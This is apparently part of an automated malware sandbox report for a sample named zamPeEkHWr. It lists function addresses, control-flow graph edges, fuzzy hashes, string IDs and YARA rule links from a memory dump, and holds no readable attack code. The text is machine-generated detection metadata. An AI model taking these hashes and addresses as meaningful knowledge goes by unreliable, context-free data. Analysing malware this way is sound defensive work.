                                                  control_flow_graph 542 7ffd9b87830b-7ffd9b878311 543 7ffd9b878313-7ffd9b878318 542->543 544 7ffd9b87831a-7ffd9b87831e 542->544 545 7ffd9b878321-7ffd9b878339 543->545 544->545 547 7ffd9b87833b-7ffd9b87833c 545->547 548 7ffd9b878369-7ffd9b878382 545->548 549 7ffd9b87833f-7ffd9b87834f 547->549 551 7ffd9b878385-7ffd9b8783ba 548->551 549->551 553 7ffd9b878351-7ffd9b878367 549->553 557 7ffd9b878404-7ffd9b878414 551->557 558 7ffd9b8783bc-7ffd9b8783d5 551->558 553->548 553->549 559 7ffd9b87842e-7ffd9b87843c 558->559 560 7ffd9b8783d7-7ffd9b8783e7 558->560 563 7ffd9b87843e-7ffd9b878469 559->563 564 7ffd9b878486 559->564 560->557 567 7ffd9b8784c2-7ffd9b8784c6 563->567 568 7ffd9b87846b-7ffd9b87846e 563->568 565 7ffd9b8784c8-7ffd9b8784cb 564->565 566 7ffd9b878488-7ffd9b87848b 564->566 569 7ffd9b8784cd-7ffd9b8784ed 565->569 570 7ffd9b878515-7ffd9b878539 565->570 571 7ffd9b87848d-7ffd9b8784a1 566->571 572 7ffd9b87850c-7ffd9b87850d 566->572 567->565 573 7ffd9b878470-7ffd9b878472 568->573 574 7ffd9b8784ef-7ffd9b8784f2 568->574 593 7ffd9b8784a8-7ffd9b8784ab call 7ffd9b870540 571->593 578 7ffd9b878510-7ffd9b878513 572->578 579 7ffd9b87850f 572->579 576 7ffd9b878474 573->576 577 7ffd9b8784ee 573->577 575 7ffd9b8784f4-7ffd9b8784f9 574->575 582 7ffd9b8784fa-7ffd9b8784fb 575->582 583 7ffd9b8784b6-7ffd9b8784bb 576->583 584 7ffd9b878476-7ffd9b878478 576->584 577->574 578->570 579->578 585 7ffd9b8784fe 582->585 586 7ffd9b8784fd 582->586 588 7ffd9b8784bc-7ffd9b8784c1 583->588 584->575 587 7ffd9b87847a 584->587 590 7ffd9b878500-7ffd9b87850a 585->590 586->585 587->588 591 7ffd9b87847c-7ffd9b87847e 587->591 590->572 591->582 592 7ffd9b878480 591->592 592->567 594 7ffd9b878482-7ffd9b878484 592->594 596 7ffd9b8784b0-7ffd9b8784c1 call 7ffd9b8784c2 593->596 594->564 594->590
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: O_^
                                                  • API String ID: 0-897003143
                                                  • Opcode ID: 0cbd8979b6636c851ccda260e18e018b85dab8566d7ce664bbd32c2f58b15773
                                                  • Instruction ID: 7ec3598a191b7fe1fe79511c3cfcb8cf8f84fed899a4154010547ef236e65290
                                                  • Opcode Fuzzy Hash: 0cbd8979b6636c851ccda260e18e018b85dab8566d7ce664bbd32c2f58b15773
                                                  • Instruction Fuzzy Hash: CA711721A0E68E0FE776977548611B57BA0EF47228F1A01FAD49DCB0E7DD1C690B8352
                                                  Function 00007FFD9B88A335 Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ^
                                                  • API String ID: 0-1590793086
                                                  • Opcode ID: cd587b532ced53e1e4a8e392a8d27ea6a3b3baee3239ac3325fa7eff769f5c0d
                                                  • Instruction ID: 23b8c6fbe94ff40af4faf3622ffa5283c384cd76753a7608274dfc0da3ff1b88
                                                  • Opcode Fuzzy Hash: cd587b532ced53e1e4a8e392a8d27ea6a3b3baee3239ac3325fa7eff769f5c0d
                                                  • Instruction Fuzzy Hash: 56614A3170EA9A4FE729977C58765B53BD0EF5A31071901BED489C71A3ED14A8078781
                                                  Function 00007FFD9B8BF6D0 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: -K_H
                                                  • API String ID: 0-1257718503
                                                  • Opcode ID: 6f354a2742b5cf994a89eb57c77752dbe17a57dc401bf9f2c73645811c5534a1
                                                  • Instruction ID: ca7f4d065ab874e1f0c8d470e7b73eaca3b5a4d44b4f6e1b0b8cceb389d114b5
                                                  • Opcode Fuzzy Hash: 6f354a2742b5cf994a89eb57c77752dbe17a57dc401bf9f2c73645811c5534a1
                                                  • Instruction Fuzzy Hash: 2D51F661B1DA5E4FEBA8DB6894A467437C2EF9C340F0541BED04EC72E6DD25AD42C780
                                                  Function 00007FFD9B88B6E5 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1127 7ffd9b88b6e5-7ffd9b8be4a6 call 7ffd9b8b9490 1139 7ffd9b8be4ab-7ffd9b8be4cd 1127->1139
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: kP
                                                  • API String ID: 0-156464900
                                                  • Opcode ID: 4151c92dd9a15a3cb4034a901c5c430337c0e431a46e7ae3938a7a080a770d19
                                                  • Instruction ID: 2b3c65de5e8376d1d9beffb4773a260817a603a0194fe699b01eb6360ad1e819
                                                  • Opcode Fuzzy Hash: 4151c92dd9a15a3cb4034a901c5c430337c0e431a46e7ae3938a7a080a770d19
                                                  • Instruction Fuzzy Hash: 6E31C272B1C9590FEB5CAA18A8569F973D1EBA9350F0040BFF45F831D7ED25A8474282
                                                  Function 00007FFD9B87C348 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: aO_H
                                                  • API String ID: 0-2621181374
                                                  • Opcode ID: c351a067272fd3e1ff63b9d190880b8edefa70a28703bce9172871221f041f3a
                                                  • Instruction ID: 8954db12cf63d4db205638bda6bd6e380715d4ca51003cde7a277a8f3cc40a5e
                                                  • Opcode Fuzzy Hash: c351a067272fd3e1ff63b9d190880b8edefa70a28703bce9172871221f041f3a
                                                  • Instruction Fuzzy Hash: 2BE08693F1DC471BE748E77888A586493C1EF5834870440B5E51EC75DBED28B8454B00
                                                  Function 00007FFD9B87C1DE Relevance: .6, Instructions: 647COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ea213e56cf2fb6f4aab2cb84c271198942e0874f1f452a9b68e68af648289f0a
                                                  • Instruction ID: bd8986cbc35a45ae0b8bb6bd59f14d611e8d3994b170cb3b45dfa79bc3e47970
                                                  • Opcode Fuzzy Hash: ea213e56cf2fb6f4aab2cb84c271198942e0874f1f452a9b68e68af648289f0a
                                                  • Instruction Fuzzy Hash: 79320A35619A4E8FEBD8EF4CC0A8BA533E2FF59708F5544A4E41DC72A6CA75E941CB00
                                                  Function 00007FFD9B899D58 Relevance: .6, Instructions: 621COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fe204b9e081287615aaf13dfec3c233de04d907545583db9d1ba46a71122898b
                                                  • Instruction ID: 63cae4799e9bd4a07043550798f21955c540dfb44036b659e3471e32508eaee2
                                                  • Opcode Fuzzy Hash: fe204b9e081287615aaf13dfec3c233de04d907545583db9d1ba46a71122898b
                                                  • Instruction Fuzzy Hash: 88124730A2DB494FE728EB28C4615B1B7E0FF59310B1545BED09ACB5A6DE25F842CBC1
                                                  Function 00007FFD9B88092F Relevance: .6, Instructions: 584COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8aa7f79c6eece7ced068837cfc942c3ec811783cd8a33dc3f6c500e7cbe930f9
                                                  • Instruction ID: 7efa2b8a5b4b5963ef5485284c9a4b348a5e73d581882696e0f07fb571e4e6a6
                                                  • Opcode Fuzzy Hash: 8aa7f79c6eece7ced068837cfc942c3ec811783cd8a33dc3f6c500e7cbe930f9
                                                  • Instruction Fuzzy Hash: 28126430A19E4E8FDB98EF18C4A4AA973E2FF98704F514569D42DC7296DE35E842CB40
                                                  Function 00007FFD9B8A8C40 Relevance: .6, Instructions: 554COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 190174eb7f6950f425d1e240fe3002db93345571583d9e04f74b390bc47d7948
                                                  • Instruction ID: 10fdd0ad46d2212fddec52b156af8456e6eb6e606b0bc5c62bfd446474e92b01
                                                  • Opcode Fuzzy Hash: 190174eb7f6950f425d1e240fe3002db93345571583d9e04f74b390bc47d7948
                                                  • Instruction Fuzzy Hash: F3F12430B1DE4E4FE7A4EB5C986567573D2EF98340F4501BAE44EC32A6DE24EC0287A1
                                                  Function 00007FFD9B87A8A2 Relevance: .5, Instructions: 540COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f04a88e610475ce3fd5e336359a790be4398463a00afd1d8181fe130c2f1e09a
                                                  • Instruction ID: b8b2838b8fa0439c9db1aee3046a0b8102d3c963cf95998e8592e3a2fab2106c
                                                  • Opcode Fuzzy Hash: f04a88e610475ce3fd5e336359a790be4398463a00afd1d8181fe130c2f1e09a
                                                  • Instruction Fuzzy Hash: 97123135A18A0E9FDB88DF48C8D5FEAB3B1FF58304F504569E419D7299DA34E852CB80
                                                  Function 00007FFD9B8C20E8 Relevance: .5, Instructions: 510COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 01ff7f3701f7b34750bd19ec571a14a85ba6193284bb169e9f0ae06b8169563c
                                                  • Instruction ID: 125c2e3fb4861c0a0e06cc69f215e77336e6f35cb16fac5be698dd682541c028
                                                  • Opcode Fuzzy Hash: 01ff7f3701f7b34750bd19ec571a14a85ba6193284bb169e9f0ae06b8169563c
                                                  • Instruction Fuzzy Hash: 77E1C37070DA498FDB98EB18D465A75B3E2FFA9300B1541AED04EC72A6DD25FC42C781
                                                  Function 00007FFD9B87E072 Relevance: .4, Instructions: 428COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bb08692ec65583900df5965de0d7fae3832996822a82dc04e34b009f1d8e47a6
                                                  • Instruction ID: df4ce029713bb08ff1200f5956998c0ddbf3b707a5d4533da4ebe4f8401b32de
                                                  • Opcode Fuzzy Hash: bb08692ec65583900df5965de0d7fae3832996822a82dc04e34b009f1d8e47a6
                                                  • Instruction Fuzzy Hash: FAE1B530A19A4E8FDB98DF58C8A4BA973E2FF5C305F110569E41EC7295CB35A942CB41
                                                  Function 00007FFD9B883554 Relevance: .4, Instructions: 389COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c66474a76b999e7a4145f479f56345006c1a54393cc63cb06ef239db2ac676d8
                                                  • Instruction ID: 0cef58a780cf4f96ac4c407d5ca5b500c251c54b4b09e75ee624734374513f07
                                                  • Opcode Fuzzy Hash: c66474a76b999e7a4145f479f56345006c1a54393cc63cb06ef239db2ac676d8
                                                  • Instruction Fuzzy Hash: 4DD12274714A4E8FDBD8EF18C8A4AA973E2FF98304B514569E42EC7295CB35E852CB40
                                                  Function 00007FFD9B894C20 Relevance: .4, Instructions: 366COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 999c30c2246890fbc5e2dcbf264c55ac37eff7d3f21375bf0225b3a87b68bc15
                                                  • Instruction ID: 76286faba0dcef2d9597e958adb1aae5a6f77e4a83fe1655cd7c19779f00144b
                                                  • Opcode Fuzzy Hash: 999c30c2246890fbc5e2dcbf264c55ac37eff7d3f21375bf0225b3a87b68bc15
                                                  • Instruction Fuzzy Hash: 3BA1843161EF4D4FE7699B5C98A14B177E0EF99321F1502BED08AC76B2ED35B8028391
                                                  Function 00007FFD9B884153 Relevance: .4, Instructions: 361COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 54d7c0fd0f74b83fa0e32f58aa5072d4b7c9e44bdeefc52efb91a8514dd2db88
                                                  • Instruction ID: 865eb223b760838c34cccbf249492a59aa35492fde7fbf9681691c5504689f10
                                                  • Opcode Fuzzy Hash: 54d7c0fd0f74b83fa0e32f58aa5072d4b7c9e44bdeefc52efb91a8514dd2db88
                                                  • Instruction Fuzzy Hash: 3CC14135714A0E8FDBD8EF18C8A4AA973E2FF9C314B544569D42EC7296CB35E852CB40
                                                  Function 00007FFD9B880A91 Relevance: .3, Instructions: 341COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dafdbc43b396adf36e8cc04151188a1ff7d17e7cf56e958561eff5f755c0e9d4
                                                  • Instruction ID: 0d8aa70b5b4c42c55a6e24f3877c1040dbc36a3df4fbb35dc9738b8c432aa116
                                                  • Opcode Fuzzy Hash: dafdbc43b396adf36e8cc04151188a1ff7d17e7cf56e958561eff5f755c0e9d4
                                                  • Instruction Fuzzy Hash: C0C16134B18A4E8FDB98EF58C494AAA73E2FF58304F514569E42DC7296DB34ED42CB40
                                                  Function 00007FFD9B87D7B3 Relevance: .3, Instructions: 337COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e16d66cb8b9e1908e1c992bbf55a4146da4edc5483a91e44adf2ebee5af09ca5
                                                  • Instruction ID: a3016bda9c5bc0eb70031140d1e738c1f85ff6f24aa475aa87d7e8d8dd832f3c
                                                  • Opcode Fuzzy Hash: e16d66cb8b9e1908e1c992bbf55a4146da4edc5483a91e44adf2ebee5af09ca5
                                                  • Instruction Fuzzy Hash: B0C1E274604A4E8FEBC4EF58C8987A937E1FB68305F24057E981DCB296DF369592CB00
                                                  Function 00007FFD9B88B6F5 Relevance: .3, Instructions: 336COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 33aee43e1f37f992c8ced939ccf4fc7612dd8e7cadfb00915df2a0424c7479ba
                                                  • Instruction ID: 333cd8d0f9055e98a82915e15e3a506fbc6424b83762d8ef714e2fc3b35701f4
                                                  • Opcode Fuzzy Hash: 33aee43e1f37f992c8ced939ccf4fc7612dd8e7cadfb00915df2a0424c7479ba
                                                  • Instruction Fuzzy Hash: C3B16A7160D78A4FE778DB6894696BA77D1EF9D300F0101BEC48DC72A2DE35B8428B81
                                                  Function 00007FFD9B8C2138 Relevance: .3, Instructions: 330COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 07782796ddd7b8e89804b0816c5c85c9cd6e6c626acde8d6efb97537606abc2c
                                                  • Instruction ID: f33105c4cc28cf198fd0d2c56ab8db2fc05776d1da4abe53947385f5f9cd281a
                                                  • Opcode Fuzzy Hash: 07782796ddd7b8e89804b0816c5c85c9cd6e6c626acde8d6efb97537606abc2c
                                                  • Instruction Fuzzy Hash: BDB16E70A19A0E8FEBA8EB58C0A0B7573D1FF58305F59447ED44D87696CA39E9C2C780
                                                  Function 00007FFD9B87D826 Relevance: .3, Instructions: 309COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5dd013186aacb68948b9b9fcd078a9b09d2216c5082649100197b07cf08c64b1
                                                  • Instruction ID: 8b4532ce6817ed100959da5120b427d258953755d4567e35e87aaa991801016d
                                                  • Opcode Fuzzy Hash: 5dd013186aacb68948b9b9fcd078a9b09d2216c5082649100197b07cf08c64b1
                                                  • Instruction Fuzzy Hash: A4C1AF74604A4E8FEBC5EF58C89C7A937E1FB68305F24457E982DCB295DB329592CB00
                                                  Function 00007FFD9B887AD3 Relevance: .3, Instructions: 307COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7c3ab225006ed880c4b90eea458a47b7b55f93adeffc626adac324dfae303404
                                                  • Instruction ID: 024ba14d74c34ae3143420e4345efc7a3c1b2c1dd03e77e30d1ff49a3825fc27
                                                  • Opcode Fuzzy Hash: 7c3ab225006ed880c4b90eea458a47b7b55f93adeffc626adac324dfae303404
                                                  • Instruction Fuzzy Hash: 45B11F74714A4E8FDB98EF18C8A4BA973E2FF9C314B504569D42EC7296CB35E852CB40
                                                  Function 00007FFD9B88B705 Relevance: .3, Instructions: 306COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 38a84af3a17228d73788715f6fb8841a4f142a9c46e86a9e2b1d83624e934732
                                                  • Instruction ID: cfbb6cd855e015b58b4967f68d68418174394d1858fb90594cf5f69e91bedcad
                                                  • Opcode Fuzzy Hash: 38a84af3a17228d73788715f6fb8841a4f142a9c46e86a9e2b1d83624e934732
                                                  • Instruction Fuzzy Hash: E6813E61B0D9258BE32DB3BC78655F97780DF48368F0401BBE01E871D7ED69644382C5
                                                  Function 00007FFD9B872FF0 Relevance: .3, Instructions: 300COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 489159d725569f3b233f646a4bdb17c1dba1d2ac56a7347befa33ab94c70ec1e
                                                  • Instruction ID: 3b7f6a6d8354b76a7a5cb4e095284a19d579c91aec258772052290dee9bd697f
                                                  • Opcode Fuzzy Hash: 489159d725569f3b233f646a4bdb17c1dba1d2ac56a7347befa33ab94c70ec1e
                                                  • Instruction Fuzzy Hash: 0F812631B1CA4D4FDB68DB6C98556BA77E1EB99310F00427FE04DC32A2DE34A9468782
                                                  Function 00007FFD9B8880FD Relevance: .3, Instructions: 294COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 61bff6c6f421d55ef4fed622cc42d421cb160514e02968aa218270bb659bf259
                                                  • Instruction ID: 3e808e1fed1d5aafc43f749405fca76454bc8f6a176858c28994460faea224ef
                                                  • Opcode Fuzzy Hash: 61bff6c6f421d55ef4fed622cc42d421cb160514e02968aa218270bb659bf259
                                                  • Instruction Fuzzy Hash: 14814A21A0ED9E4FE7759BA448251B97BE1EF99301F0501BED4A9C70E3DE386A078741
                                                  Function 00007FFD9B87D875 Relevance: .3, Instructions: 287COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c4b9230528ba684edf7e560847af46502d2583a753618e322da583c48749c0f
                                                  • Instruction ID: 7765c58ba937be100636f09a054e41d256a28d8636e901e74eed7f7ebd60fc25
                                                  • Opcode Fuzzy Hash: 6c4b9230528ba684edf7e560847af46502d2583a753618e322da583c48749c0f
                                                  • Instruction Fuzzy Hash: C5B1AF74605A4E8FEBC5EF58C49C7A937E1FB68305F24457E982DCB295DB329492CB00
                                                  Function 00007FFD9B88BC00 Relevance: .3, Instructions: 284COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5bbb46b7f5c87773dc58667d2399fa9e8078f3b6746a9414b6ce0972379ed374
                                                  • Instruction ID: ec35a7c7d7afedc5a8e83c4b77b7c94d11a1d677d0bc726fdf2218e35d565bc1
                                                  • Opcode Fuzzy Hash: 5bbb46b7f5c87773dc58667d2399fa9e8078f3b6746a9414b6ce0972379ed374
                                                  • Instruction Fuzzy Hash: 99812331B1EA4A4FDB2CDB6CD8519B1B7E1EF8931471506BED48AC72A7DD25B8438380
                                                  Function 00007FFD9B89D850 Relevance: .3, Instructions: 284COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ed5963e8cc88c6af9be49fd22c32078bda3c27f8ccc46f9d0662629806fd4749
                                                  • Instruction ID: 64a7be11101f6532a891c3a1bcf74e5a02316b7d17cdb63d6d4485a4512acb07
                                                  • Opcode Fuzzy Hash: ed5963e8cc88c6af9be49fd22c32078bda3c27f8ccc46f9d0662629806fd4749
                                                  • Instruction Fuzzy Hash: 63810031B1AA4A4FDB2CEB6CD490971B7E1EF8931071546BDD48BC72A7DE25BC428780
                                                  Function 00007FFD9B88A39D Relevance: .3, Instructions: 279COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ef5b03186d5d8e78c7ac802b33e84ea883d2bc84b146396665665557e43ec7b7
                                                  • Instruction ID: e09976e2448cd7917b468c9327a3cd0d43805fc661b0ec7b2c482324213e16e5
                                                  • Opcode Fuzzy Hash: ef5b03186d5d8e78c7ac802b33e84ea883d2bc84b146396665665557e43ec7b7
